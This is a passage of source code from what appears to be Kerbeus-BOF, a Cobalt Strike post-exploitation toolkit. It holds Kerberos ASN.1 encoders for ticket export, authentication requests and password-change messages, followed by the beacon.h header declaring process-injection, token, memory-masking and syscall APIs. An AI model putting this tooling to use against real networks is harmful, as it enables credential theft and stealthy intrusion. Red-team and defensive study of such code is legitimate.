        MSVCRT$sprintf(datatime, "%04d%02d%02d%02d%02d%02dZ", cred_info->starttime.year, cred_info->starttime.month, cred_info->starttime.day, cred_info->starttime.hour, cred_info->starttime.minute, cred_info->starttime.second);
        AsnElt starttimeSeqContext = { 0 };
        if (PackString(5, ASN_GeneralizedTime, datatime, &starttimeSeqContext)) return true;
        asnElements[allNodesIndex] = starttimeSeqContext; allNodesIndex++;
    }

    // endtime         [6] KerberosTime OPTIONAL
    if (cred_info->endtime.isSet) {
        char datatime[18];
        MSVCRT$sprintf(datatime, "%04d%02d%02d%02d%02d%02dZ", cred_info->endtime.year, cred_info->endtime.month, cred_info->endtime.day, cred_info->endtime.hour, cred_info->endtime.minute, cred_info->endtime.second);
        AsnElt endtimeSeqContext = { 0 };
        if (PackString(6, ASN_GeneralizedTime, datatime, &endtimeSeqContext)) return true;
        asnElements[allNodesIndex] = endtimeSeqContext; allNodesIndex++;
    }

    // renew-till      [7] KerberosTime OPTIONAL
    if (cred_info->renew_till.isSet) {
        char datatime[18];
        MSVCRT$sprintf(datatime, "%04d%02d%02d%02d%02d%02dZ", cred_info->renew_till.year, cred_info->renew_till.month, cred_info->renew_till.day, cred_info->renew_till.hour, cred_info->renew_till.minute, cred_info->renew_till.second);
        AsnElt renew_tillSeqContext = { 0 };
        if (PackString(7, ASN_GeneralizedTime, datatime, &renew_tillSeqContext)) return true;
        asnElements[allNodesIndex] = renew_tillSeqContext; allNodesIndex++;
    }

    // srealm          [8] Realm OPTIONAL
    if (cred_info->srealm) {
        AsnElt srealmAsnSeqContext = { 0 };
        if( PackStringExt(8, ASN_IA5String, ASN_GeneralString, cred_info->srealm, &srealmAsnSeqContext) ) return true;
        asnElements[allNodesIndex] = srealmAsnSeqContext; allNodesIndex++;
    }

    // sname           [9] PrincipalName OPTIONAL
    if (cred_info->sname.name_count) {
        AsnElt pnameAsn = { 0 }, pnameAsnContext = { 0 };
        if (AsnPrincipalNameEncode(&(cred_info->sname), &pnameAsn)) return true;
        if (MakeImplicit(ASN_CONTEXT, 9, &pnameAsn, &pnameAsnContext)) return true;
        asnElements[allNodesIndex] = pnameAsnContext; allNodesIndex++;
    }

    if (Make3(ASN_SEQUENCE, asnElements, allNodesCount, seq)) return true;
    return false;
}

bool AsnEncKrbCredPartEncode(EncKrbCredPart* cred_part, AsnElt* totalSeq2Context) {
    // ticket-info     [0] SEQUENCE OF KrbCredInfo
    AsnElt infoAsn = { 0 }, seq1 = { 0 }, seq2 = { 0 }, seq2Context = { 0 };
    if (AsnKrbCredInfoEncode(&(cred_part->ticket_info[0]), &infoAsn)) return true;
    if (Make3(ASN_SEQUENCE, &infoAsn, 1, &seq1)) return true;
    if (Make3(ASN_SEQUENCE, &seq1, 1, &seq2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 0, &seq2, &seq2Context)) return true;

    AsnElt totalSeq = { 0 }, totalSeq2 = { 0 };
    if (Make3(ASN_SEQUENCE, &seq2Context, 1, &totalSeq)) return true;
    if (Make3(ASN_SEQUENCE, &totalSeq, 1, &totalSeq2)) return true;
    if (MakeImplicit(ASN_APPLICATION, 29, &totalSeq2, totalSeq2Context)) return true;

    return false;
}

bool AsnKrbCredEncode(KRB_CRED* krb_cred, AsnElt* finalContext) {
    // pvno            [0] INTEGER (5)
    AsnElt pvnoSeqContext = { 0 };
    if (PackIntegerLong(0, krb_cred->pvno, &pvnoSeqContext)) return true;

    // msg-type        [1] INTEGER (22)
    AsnElt msg_typeSeqContext = { 0 };
    if (PackIntegerLong(1, krb_cred->msg_type, &msg_typeSeqContext)) return true;

    // tickets         [2] SEQUENCE OF Ticket
    AsnElt ticketAsn = { 0 }, ticketSeq = { 0 }, ticketSeq2 = { 0 }, ticketSeq2Context = { 0 };
    if (AsnTicketEncode(&(krb_cred->tickets[0]), &ticketAsn)) return true;
    if (Make3(ASN_SEQUENCE, &ticketAsn, 1, &ticketSeq)) return true;
    if (Make3(ASN_SEQUENCE, &ticketSeq, 1, &ticketSeq2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 2, &ticketSeq2, &ticketSeq2Context)) return true;

    // enc-part        [3] EncryptedData -- EncKrbCredPart
    AsnElt enc_partAsn = { 0 };
    if (AsnEncKrbCredPartEncode(&(krb_cred->enc_part), &enc_partAsn)) return true;
    int blobBytesSize = 0;
    byte* blobBytes = 0;
    if (AsnToBytesEncode(&enc_partAsn, &blobBytesSize, &blobBytes)) return true;

    AsnElt blobSeqContext = { 0 };
    if (PackBlock(2, blobBytes, blobBytesSize, &blobSeqContext) ) return true;

    // etype == 0 -> no encryption
    AsnElt etypeSeqContext = { 0 };
    if (PackIntegerLong(0, 0, &etypeSeqContext)) return true;

    AsnElt seq[] = { etypeSeqContext, blobSeqContext };
    AsnElt infoSeq = { 0 }, infoSeq2 = { 0 }, infoSeq2Context = { 0 };
    if (Make3(ASN_SEQUENCE, seq, 2, &infoSeq)) return true;
    if (Make3(ASN_SEQUENCE, &infoSeq, 1, &infoSeq2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 3, &infoSeq2, &infoSeq2Context)) return true;

    // all the components
    AsnElt seqTotal[] = { pvnoSeqContext, msg_typeSeqContext, ticketSeq2Context, infoSeq2Context };
    AsnElt total = { 0 };
    if (Make3(ASN_SEQUENCE, seqTotal, 4, &total)) return true;

    // tag the final total ([APPLICATION 22])
    AsnElt final = { 0 };
    if (Make3(ASN_SEQUENCE, &total, 1, &final)) return true;
    if (MakeImplicit(ASN_APPLICATION, 22, &final, finalContext)) return true;

    return false;
}

bool AsnADEncode(ADIfRelevant* adif, AsnElt** finalContext) {
    AsnElt adTypeSeqContext = { 0 };
    if (PackIntegerLong(0, adif->ad_type, &adTypeSeqContext)) return true;

    AsnElt adDataSeqContext = { 0 };
    if (PackBlock(1, adif->ad_data, adif->ad_data_length, &adDataSeqContext) ) return true;

    AsnElt seq[] = { adTypeSeqContext, adDataSeqContext };
    if (Make3(ASN_SEQUENCE, seq, 2, finalContext)) return true;
    return false;
}

bool AsnADRestrictionEntryEncode(ADRestrictionEntry* adre, AsnElt* finalContext) {
    // KERB-AD-RESTRICTION-ENTRY encoding
    // restriction-type       [0] Int32
    AsnElt adRestrictionEntrySeqContext = { 0 };
    if (PackIntegerLong(0, adre->restriction_type, &adRestrictionEntrySeqContext)) return true;

    // restriction            [1] OCTET STRING
    AsnElt adRestrictionEntryDataSeqContext = { 0 };
    if (PackBlock(1, adre->restriction, adre->restriction_length, &adRestrictionEntryDataSeqContext) ) return true;

    AsnElt seq[] = { adRestrictionEntrySeqContext, adRestrictionEntryDataSeqContext };
    AsnElt seq1 = { 0 }, seq2 = { 0 };
    if (Make3(ASN_SEQUENCE, seq, 2, &seq1)) return true;
    if (Make3(ASN_SEQUENCE, &seq1, 1, &seq2)) return true;

    if (AsnToBytesEncode(&seq2, &(adre->ad_data_length), &(adre->ad_data))) return true;

    if (AsnADEncode(adre, finalContext)) return true;
    return false;
}

bool AsnADIfRelevantEncode(ADIfRelevant* adif, AsnElt* finalContext) {
    // ad-data            [1] OCTET STRING
    if (adif->ADData_count > 0) {
        AsnElt* adList = MemAlloc(sizeof(AsnElt) * adif->ADData_count);

        for (int i = 0; i < adif->ADData_count; i++) {
            AsnElt addrElt = { 0 };

            switch (((ADIfRelevant*)adif->ADData[i])->ad_type) {
                case 141:
                    if (AsnADRestrictionEntryEncode(adif->ADData[i], &addrElt)) return true;
                    break;
                case 142:
                    if (AsnADEncode(adif->ADData[i], &addrElt)) return true;
                    break;
                default:
                    break;
            }

            adList[i] = addrElt;
        }

        AsnElt seq = { 0 };
        if (Make3(ASN_SEQUENCE, adList, adif->ADData_count, &seq)) return true;
        if (AsnToBytesEncode(&seq, &(adif->ad_data_length), &(adif->ad_data))) return true;
    }

    if (AsnADEncode(adif, finalContext)) return true;
    return false;
}

bool ReqToAsnEncode(AS_REQ as_req, int APP_NUM, AsnElt* totalSeqApp) {
    // pvno            [1] INTEGER (5)
    AsnElt pvnoContext = { 0 };
    if (PackIntegerLong(1, as_req.pvno, &pvnoContext)) return true;

    // msg-type        [2] INTEGER (10 -- AS -- )
    AsnElt msg_type_ASNSeqContext = { 0 };
    if (PackIntegerLong(2, as_req.msg_type, &msg_type_ASNSeqContext)) return true;

    // padata          [3] SEQUENCE OF PA-DATA OPTIONAL
    AsnElt *padatas = MemAlloc(sizeof(AsnElt) * as_req.pa_data_count);
    if (!padatas && as_req.pa_data_count) {
        PRINT_OUT("[x] Failed alloc memory\n");
        return true;
    }
    for (int i = 0; i < as_req.pa_data_count; ++i) {
        AsnElt pd = {0};
        if (AsnPaDataEncode(as_req.pa_data[i], &pd)) return true;
        padatas[i] = pd;
    }

    AsnElt padata_ASNSeq = { 0 }, padata_ASNSeq2 = { 0 }, padata_ASNSeqContext = { 0 };
    if (Make3(ASN_SEQUENCE, padatas, as_req.pa_data_count, &padata_ASNSeq)) return true;
    if (Make3(ASN_SEQUENCE, &padata_ASNSeq, 1, &padata_ASNSeq2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 3, &padata_ASNSeq2, &padata_ASNSeqContext)) return true;

    // req-body        [4] KDC-REQ-BODY
    AsnElt req_Body_ASN = { 0 }, req_Body_ASNSeq = { 0 }, req_Body_ASNSeqContext = { 0 };
    if (AsnKDCReqBodyEncode(&(as_req.req_body), &req_Body_ASN)) return true;
    if (Make3(ASN_SEQUENCE, &req_Body_ASN, 1, &req_Body_ASNSeq)) return true;
    if (MakeImplicit(ASN_CONTEXT, 4, &req_Body_ASNSeq, &req_Body_ASNSeqContext)) return true;

    // encode it all into a sequence
    AsnElt total[] = { pvnoContext, msg_type_ASNSeqContext, padata_ASNSeqContext, req_Body_ASNSeqContext };
    AsnElt seq = { 0 };
    if (Make3(ASN_SEQUENCE, total, 4, &seq)) return true;

    // AS-REQ          ::= [APP_NUM 10] KDC-REQ
    // TGS-REQ         ::= [APP_NUM 12] KDC-REQ
    AsnElt totalSeq = { 0 };
    if (Make3(ASN_SEQUENCE, &seq, 1, &totalSeq)) return true;
    if (MakeImplicit(ASN_APPLICATION, APP_NUM, &totalSeq, totalSeqApp)) return true;

    return false;
}

bool AsnEncKrbPrivPartEncode(EncKrbPrivPart* privPart, AsnElt* totalSeq) {
    // user-data       [0] OCTET STRING
    AsnElt new_passwordAsn = { 0 };
    if (MakeBlob(privPart->new_password, 0, my_strlen(privPart->new_password), &new_passwordAsn)) return true;

    AsnElt new_passwordAsnContext = { 0 }, principalAsn = { 0 }, principalAsnContext = { 0 }, realmAsn = { 0 }, realmAsnContext = { 0 }, new_passwordSeq = { 0 };
    if (privPart->username) {
        PrincipalName principal = { 0 };
        principal.name_type = PRINCIPAL_NT_PRINCIPAL;
        principal.name_count = 1;
        if (my_copybuf(&(principal.name_string), privPart->username, my_strlen(privPart->username) + 1)) return true;
        if (AsnPrincipalNameEncode(&principal, &principalAsn)) return true;

        if (MakeString(ASN_GeneralString, privPart->realm, &realmAsn)) return true;

        if (MakeExplicit(ASN_CONTEXT, 0, &new_passwordAsn, 1, &new_passwordAsnContext)) return true;
        if (MakeImplicit(ASN_CONTEXT, 1, &principalAsn, &principalAsnContext)) return true;
        if (MakeExplicit(ASN_CONTEXT, 2, &realmAsn, 1, &realmAsnContext)) return true;

        AsnElt seqPass[] = { new_passwordAsnContext, principalAsnContext, realmAsnContext };
        if (Make3(ASN_SEQUENCE, seqPass, 3, &new_passwordSeq)) return true;
    }
    else {
        if (MakeExplicit(ASN_CONTEXT, 0, &new_passwordAsn, 1, &new_passwordAsnContext)) return true;
        if (Make3(ASN_SEQUENCE, &new_passwordAsnContext, 1, &new_passwordSeq)) return true;
    }

    AsnElt new_passwordBlobAsn = { 0 }, new_passwordSeqContext = { 0 };
    char* new_passwordBlob = NULL;
    int new_passwordBlobSize = 0;
    if (AsnToBytesEncode(&new_passwordSeq, &new_passwordBlobSize, &new_passwordBlob))return true;
    if (MakeBlob(new_passwordBlob, 0, new_passwordBlobSize, &new_passwordBlobAsn)) return true;
    if (MakeExplicit(ASN_CONTEXT, 0, &new_passwordBlobAsn, 1, &new_passwordSeqContext)) return true;

    // seq-number      [3] UInt32 OPTIONAL
    AsnElt seq_numberSeqContext = { 0 };
    if (PackIntegerLong(3, privPart->seq_number, &seq_numberSeqContext)) return true;

    //  s-address       [4] HostAddress
    AsnElt hostAddressTypeSeqContext = { 0 };
    if (PackIntegerLong(0, 20, &hostAddressTypeSeqContext)) return true;

    AsnElt hostAddressAddressSeqContext = { 0 };
    if (PackBlock(1, privPart->host_name, my_strlen(privPart->host_name), &hostAddressAddressSeqContext) ) return true;

    AsnElt hostAddressSeq = { 0 }, hostAddressSeq2 = { 0 }, hostAddressSeq2Context = { 0 };
    AsnElt seqHostAddress[] = { hostAddressTypeSeqContext, hostAddressAddressSeqContext };
    if (Make3(ASN_SEQUENCE, seqHostAddress, 2, &hostAddressSeq)) return true;
    if (Make3(ASN_SEQUENCE, &hostAddressSeq, 1, &hostAddressSeq2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 4, &hostAddressSeq2, &hostAddressSeq2Context)) return true;

    AsnElt seqAsn = { 0 }, seqAsnContext = { 0 };
    AsnElt seq[] = { new_passwordSeqContext, seq_numberSeqContext, hostAddressSeq2Context };
    if (Make3(ASN_SEQUENCE, seq, 3, &seqAsn)) return true;
    if (Make3(ASN_SEQUENCE, &seqAsn, 1, &seqAsnContext)) return true;

    if (MakeImplicit(ASN_APPLICATION, 28, &seqAsnContext, totalSeq)) return true;

    return false;
}

bool AsnKrbPrivEncode(KRB_PRIV* privPart, AsnElt* totalSeq) {
    // pvno            [0] INTEGER (5)
    AsnElt pvnoSeqContext = { 0 };
    if (PackIntegerLong(0, privPart->pvno, &pvnoSeqContext)) return true;

    // msg-type        [1] INTEGER (21)
    AsnElt msg_typeSeqContext = { 0 };
    if (PackIntegerLong(1, privPart->msg_type, &msg_typeSeqContext)) return true;

    // enc-part        [3] EncryptedData -- EncKrbPrivPart
    AsnElt enc_partAsn = { 0 };
    if (AsnEncKrbPrivPartEncode(&(privPart->enc_part), &enc_partAsn)) return true;
    byte* enc_partByte = NULL;
    int enc_partByteSize = 0;
    if (AsnToBytesEncode(&enc_partAsn, &enc_partByteSize, &enc_partByte)) return true;

    byte* encBytes = NULL;
    int encBytesSize = 0;
    if (encrypt(enc_partByte, enc_partByteSize, privPart->ekey.key_value, privPart->ekey.key_type, KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART, &encBytes, &encBytesSize)) return true;

    AsnElt blobSeqContext = { 0 };
    if (PackBlock(2, encBytes, encBytesSize, &blobSeqContext) ) return true;

    // etype
    AsnElt etypeSeqContext = { 0 };
    if (PackIntegerLong(0, privPart->ekey.key_type, &etypeSeqContext)) return true;

    AsnElt encPrivSeq = { 0 }, encPrivSeq2 = { 0 }, encPrivSeq2Context = { 0 };
    AsnElt seqBlobAsn[] = { etypeSeqContext,  blobSeqContext };
    if (Make3(ASN_SEQUENCE, seqBlobAsn, 2, &encPrivSeq)) return true;
    if (Make3(ASN_SEQUENCE, &encPrivSeq, 1, &encPrivSeq2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 3, &encPrivSeq2, &encPrivSeq2Context)) return true;

    AsnElt totalAsn = { 0 }, finalAsn = { 0 };
    AsnElt seqTotal[] = { pvnoSeqContext,  msg_typeSeqContext, encPrivSeq2Context };
    if (Make3(ASN_SEQUENCE, seqTotal, 3, &totalAsn)) return true;
    // tag the final total ([APPLICATION 21])
    if (Make3(ASN_SEQUENCE, &totalAsn, 1, &finalAsn)) return true;
    if (MakeImplicit(ASN_APPLICATION, 21, &finalAsn, totalSeq)) return true;

    return false;
}


================================================
FILE: AD-BOF/Kerbeus-BOF/_include/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 *    7/18/2023: Added BeaconInformation API for 4.9
 *    7/31/2023: Added Key/Value store APIs for 4.9
 *                  BeaconAddValue, BeaconGetValue, and BeaconRemoveValue
 *    8/31/2023: Added Data store APIs for 4.9
 *                  BeaconDataStoreGetItem, BeaconDataStoreProtectItem,
 *                  BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries
 *    9/01/2023: Added BeaconGetCustomUserData API for 4.9
 *    3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL
 *               Updated the BEACON_INFO data structure to add new parameters
 *    4/19/2024: Added BeaconGetSyscallInformation API for 4.10
 *    4/25/2024: Added APIs to call Beacon's system call implementation
 *    12/18/2024: Updated BeaconGetSyscallInformation API for 4.11 (Breaking changes)
 *    2/13/2025: Updated SYSCALL_API structure with more ntAPIs for 4.11
 *    3/20/2025: Updated ALLOCATED_MEMORY_SECTION structure with driploader page size for 4.12
 *    4/7/2025: Updated ALLOCATED_MEMORY_REGION structure with driploader allocation granularity for 4.12
 *    7/16/2025: Updated ALLOCATED_MEMORY_PURPOSE structure with PURPOSE_UDC2_MEMORY for 4.12
 */
#ifndef _BEACON_H_
#define _BEACON_H_
#include <windows.h>

#ifdef __cplusplus
extern "C" {
#endif // __cplusplus

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, const char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, const char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d
#define CALLBACK_CUSTOM      0x1000
#define CALLBACK_CUSTOM_LAST 0x13ff


DECLSPEC_IMPORT void   BeaconOutput(int type, const char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, const char * fmt, ...);
DECLSPEC_IMPORT BOOL   BeaconDownload(const char * filename, const char* buffer, unsigned int length);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

/* Beacon Information */
/*
 *  ptr  - pointer to the base address of the allocated memory.
 *  size - the number of bytes allocated for the ptr.
 */
typedef struct {
	char * ptr;
	size_t size;
} HEAP_RECORD;
#define MASK_SIZE 13

/* Information the user can set in the USER_DATA via a UDRL */
typedef enum {
	PURPOSE_EMPTY,
	PURPOSE_GENERIC_BUFFER,
	PURPOSE_BEACON_MEMORY,
	PURPOSE_SLEEPMASK_MEMORY,
	PURPOSE_BOF_MEMORY,
	PURPOSE_UDC2_MEMORY,
	PURPOSE_USER_DEFINED_MEMORY = 1000
} ALLOCATED_MEMORY_PURPOSE;

typedef enum {
	LABEL_EMPTY,
	LABEL_BUFFER,
	LABEL_PEHEADER,
	LABEL_TEXT,
	LABEL_RDATA,
	LABEL_DATA,
	LABEL_PDATA,
	LABEL_RELOC,
	LABEL_USER_DEFINED = 1000
} ALLOCATED_MEMORY_LABEL;

typedef enum {
	METHOD_UNKNOWN,
	METHOD_VIRTUALALLOC,
	METHOD_HEAPALLOC,
	METHOD_MODULESTOMP,
	METHOD_NTMAPVIEW,
	METHOD_USER_DEFINED = 1000,
} ALLOCATED_MEMORY_ALLOCATION_METHOD;

/**
* This structure allows the user to provide additional information
* about the allocated heap for cleanup. It is mandatory to provide
* the HeapHandle but the DestroyHeap Boolean can be used to indicate
* whether the clean up code should destroy the heap or simply free the pages.
* This is useful in situations where a loader allocates memory in the
* processes current heap.
*/
typedef struct _HEAPALLOC_INFO {
	PVOID HeapHandle;
	BOOL  DestroyHeap;
} HEAPALLOC_INFO, *PHEAPALLOC_INFO;

typedef struct _MODULESTOMP_INFO {
	HMODULE ModuleHandle;
} MODULESTOMP_INFO, *PMODULESTOMP_INFO;

typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION {
	HEAPALLOC_INFO HeapAllocInfo;
	MODULESTOMP_INFO ModuleStompInfo;
	PVOID Custom;
} ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION {
	BOOL Cleanup;
	ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod;
	ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation;
} ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_SECTION {
	ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development
	PVOID  BaseAddress;           // Pointer to virtual address of section
	SIZE_T VirtualSize;           // Virtual size of the section
	DWORD  CurrentProtect;        // Current memory protection of the section
	DWORD  PreviousProtect;       // The previous memory protection of the section (prior to masking/unmasking)
	BOOL   MaskSection;           // A boolean to indicate whether the section should be masked
	DWORD  DripLoadPageSize;      // The page size used when committing memory during drip-loading
} ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION;

typedef struct _ALLOCATED_MEMORY_REGION {
	ALLOCATED_MEMORY_PURPOSE Purpose;      // A label to indicate the purpose of the allocated memory
	PVOID  AllocationBase;                 // The base address of the allocated memory block
	SIZE_T RegionSize;                     // The size of the allocated memory block
	DWORD Type;                            // The type of memory allocated
	DWORD DripLoadAllocationGranularity;   // The allocation granularity used when reserving memory for drip-loading
	ALLOCATED_MEMORY_SECTION Sections[8];  // An array of section information structures
	ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation
} ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION;

typedef struct {
	ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6];
} ALLOCATED_MEMORY, *PALLOCATED_MEMORY;

/*
 *  version               - The version of the beacon dll was added for release 4.10
 *                          version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 *                          e.g. 0x040900 -> CS 4.9
 *                               0x041000 -> CS 4.10
 *
 *  sleep_mask_ptr        - pointer to the sleep mask base address
 *  sleep_mask_text_size  - the sleep mask text section size
 *  sleep_mask_total_size - the sleep mask total memory size
 *
 *  beacon_ptr   - pointer to beacon's base address
 *                 The stage.obfuscate flag affects this value when using CS default loader.
 *                    true:  beacon_ptr = allocated_buffer - 0x1000 (Not a valid address)
 *                    false: beacon_ptr = allocated_buffer (A valid address)
 *                 For a UDRL the beacon_ptr will be set to the 1st argument to DllMain
 *                 when the 2nd argument is set to DLL_PROCESS_ATTACH.
 *  heap_records - list of memory addresses on the heap beacon wants to mask.
 *                 The list is terminated by the HEAP_RECORD.ptr set to NULL.
 *  mask         - the mask that beacon randomly generated to apply
 *
 *  Added in version 4.10
 *  allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA
 *                     via a UDRL.
 */
typedef struct {
	unsigned int version;
	char  * sleep_mask_ptr;
	DWORD   sleep_mask_text_size;
	DWORD   sleep_mask_total_size;

	char  * beacon_ptr;
	HEAP_RECORD * heap_records;
	char    mask[MASK_SIZE];

	ALLOCATED_MEMORY allocatedMemory;
} BEACON_INFO, *PBEACON_INFO;

DECLSPEC_IMPORT BOOL   BeaconInformation(PBEACON_INFO info);

/* Key/Value store functions
 *    These functions are used to associate a key to a memory address and save
 *    that information into beacon.  These memory addresses can then be
 *    retrieved in a subsequent execution of a BOF.
 *
 *    key - the key will be converted to a hash which is used to locate the
 *          memory address.
 *
 *    ptr - a memory address to save.
 *
 * Considerations:
 *    - The contents at the memory address is not masked by beacon.
 *    - The contents at the memory address is not released by beacon.
 *
 */
DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr);
DECLSPEC_IMPORT void * BeaconGetValue(const char * key);
DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key);

/* Beacon Data Store functions
 *    These functions are used to access items in Beacon's Data Store.
 *    BeaconDataStoreGetItem returns NULL if the index does not exist.
 *
 *    The contents are masked by default, and BOFs must unprotect the entry
 *    before accessing the data buffer. BOFs must also protect the entry
 *    after the data is not used anymore.
 *
 */

#define DATA_STORE_TYPE_EMPTY 0
#define DATA_STORE_TYPE_GENERAL_FILE 1

typedef struct {
	int type;
	DWORD64 hash;
	BOOL masked;
	char* buffer;
	size_t length;
} DATA_STORE_OBJECT, *PDATA_STORE_OBJECT;

DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index);
DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries();

/* Beacon User Data functions */
DECLSPEC_IMPORT char * BeaconGetCustomUserData();

/* Beacon System call */
/* Syscalls API */
typedef struct
{
	PVOID fnAddr;
	PVOID jmpAddr;
	DWORD sysnum;
} SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY;

typedef struct
{
	SYSCALL_API_ENTRY ntAllocateVirtualMemory;
	SYSCALL_API_ENTRY ntProtectVirtualMemory;
	SYSCALL_API_ENTRY ntFreeVirtualMemory;
	SYSCALL_API_ENTRY ntGetContextThread;
	SYSCALL_API_ENTRY ntSetContextThread;
	SYSCALL_API_ENTRY ntResumeThread;
	SYSCALL_API_ENTRY ntCreateThreadEx;
	SYSCALL_API_ENTRY ntOpenProcess;
	SYSCALL_API_ENTRY ntOpenThread;
	SYSCALL_API_ENTRY ntClose;
	SYSCALL_API_ENTRY ntCreateSection;
	SYSCALL_API_ENTRY ntMapViewOfSection;
	SYSCALL_API_ENTRY ntUnmapViewOfSection;
	SYSCALL_API_ENTRY ntQueryVirtualMemory;
	SYSCALL_API_ENTRY ntDuplicateObject;
	SYSCALL_API_ENTRY ntReadVirtualMemory;
	SYSCALL_API_ENTRY ntWriteVirtualMemory;
	SYSCALL_API_ENTRY ntReadFile;
	SYSCALL_API_ENTRY ntWriteFile;
	SYSCALL_API_ENTRY ntCreateFile;
	SYSCALL_API_ENTRY ntQueueApcThread;
	SYSCALL_API_ENTRY ntCreateProcess;
	SYSCALL_API_ENTRY ntOpenProcessToken;
	SYSCALL_API_ENTRY ntTestAlert;
	SYSCALL_API_ENTRY ntSuspendProcess;
	SYSCALL_API_ENTRY ntResumeProcess;
	SYSCALL_API_ENTRY ntQuerySystemInformation;
	SYSCALL_API_ENTRY ntQueryDirectoryFile;
	SYSCALL_API_ENTRY ntSetInformationProcess;
	SYSCALL_API_ENTRY ntSetInformationThread;
	SYSCALL_API_ENTRY ntQueryInformationProcess;
	SYSCALL_API_ENTRY ntQueryInformationThread;
	SYSCALL_API_ENTRY ntOpenSection;
	SYSCALL_API_ENTRY ntAdjustPrivilegesToken;
	SYSCALL_API_ENTRY ntDeviceIoControlFile;
	SYSCALL_API_ENTRY ntWaitForMultipleObjects;
} SYSCALL_API, *PSYSCALL_API;

/* Additional Run Time Library (RTL) addresses used to support system calls.
 * If they are not set then system calls that require them will fall back
 * to the Standard Windows API.
 *
 * Required to support the following system calls:
 *    ntCreateFile
 */
typedef struct
{
	PVOID rtlDosPathNameToNtPathNameUWithStatusAddr;
	PVOID rtlFreeHeapAddr;
	PVOID rtlGetProcessHeapAddr;
} RTL_API, *PRTL_API;

/* Updated in version 4.11 to use the entire structure instead of pointers to the structure.
 * This allows for retrieving a copy of the information which would be under the BOF's
 * control instead of a reference pointer which may be obfuscated when beacon is sleeping.
 */
typedef struct
{
	SYSCALL_API syscalls;
	RTL_API     rtls;
} BEACON_SYSCALLS, *PBEACON_SYSCALLS;

/* Updated in version 4.11 to include the size of the info pointer, which equals sizeof(BEACON_SYSCALLS) */
